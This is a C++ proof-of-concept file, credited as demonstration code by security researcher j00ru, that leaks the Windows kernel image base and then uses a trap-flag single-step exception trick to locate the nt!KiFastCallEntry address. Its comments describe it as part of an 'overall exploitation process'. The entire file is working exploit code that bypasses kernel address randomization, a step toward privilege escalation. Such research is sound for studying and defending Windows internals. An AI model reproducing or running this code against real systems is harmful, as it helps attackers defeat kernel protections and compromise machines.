// Demonstration code by Mateusz "j00ru" Jurczyk.
//
// j00ru.vx@gmail.com
// http://j00ru.vexillium.org/
// @j00ru
//
#include <cstdio>
#include <cstdlib>
#include <string>

#ifndef _WIN32_WINNT
# define _WIN32_WINNT 0x0600
#endif
#include <windows.h>
#include <ddk\ntapi.h>
using namespace std;

BOOLEAN GetKernelInformation(DWORD *lpBaseAddress, PDWORD lpImageSize) {
	PSYSTEM_MODULE_INFORMATION ModuleInformation = NULL;
	ULONG InformationSize = 16;
  NTSTATUS NtStatus;
  
  do {
    InformationSize *= 2;
    ModuleInformation = (PSYSTEM_MODULE_INFORMATION)realloc(ModuleInformation, InformationSize);
    NtStatus = NtQuerySystemInformation(SystemModuleInformation,
                                        ModuleInformation,
                                        InformationSize,
                                        NULL);
  } while (NtStatus == STATUS_INFO_LENGTH_MISMATCH);

  if (!NT_SUCCESS(NtStatus)) {
    return FALSE;
  }

  *lpBaseAddress = (DWORD)ModuleInformation->Module[0].Base;
  *lpImageSize = ModuleInformation->Module[0].Size;
  
  free(ModuleInformation);
  return TRUE;
}

LONG CALLBACK OffsetExcpHandler(PEXCEPTION_POINTERS ExceptionInfo) {
  if (ExceptionInfo->ContextRecord->Eax != ExceptionInfo->ContextRecord->Eip &&
     ((ExceptionInfo->ContextRecord->Eax & 0x80000000) == 0 ||
      (ExceptionInfo->ContextRecord->Eip & 0x80000000) == 0)) {
    return EXCEPTION_CONTINUE_EXECUTION;
  }

  ExceptionInfo->ContextRecord->Eax = ExceptionInfo->ContextRecord->Eip;
  ExceptionInfo->ContextRecord->Eip = ExceptionInfo->ContextRecord->Edx;
  return EXCEPTION_CONTINUE_EXECUTION;
}

DWORD KiTrap01(ULONG Eip) {
  __asm("mov edx, offset KiTrap01_label");
  __asm("mov eax, %0" : "=m"(Eip));
  __asm("pushf");
  __asm("or dword ptr [esp], 0x100");
  __asm("popf");
  __asm("jmp eax");
  __asm("KiTrap01_label:");
}

int main(int argc, char **argv) {
  DWORD KernelImageBase;
  DWORD KernelImageSize;

  if (!GetKernelInformation(&KernelImageBase, &KernelImageSize)) {
    return EXIT_FAILURE;
  }

  // Register exception handler used throughout overall exploitation process.
  AddVectoredExceptionHandler(1, OffsetExcpHandler);

  printf("[+] Kernel image base: %x, size: %x\n",
         KernelImageBase, KernelImageSize);
  for (UINT i = 0; i < KernelImageSize; i++) {
    if (!(i & 0xfff)) {
      printf("[+] Iteration %x / %x\r", i, KernelImageSize);
    }
    if (KiTrap01(KernelImageBase + i) != KernelImageBase + i) {
      printf("\n[+] nt!KiFastCallEntry address: %x\n", KernelImageBase + i);
      break;
    }
  }

  return EXIT_SUCCESS;
}

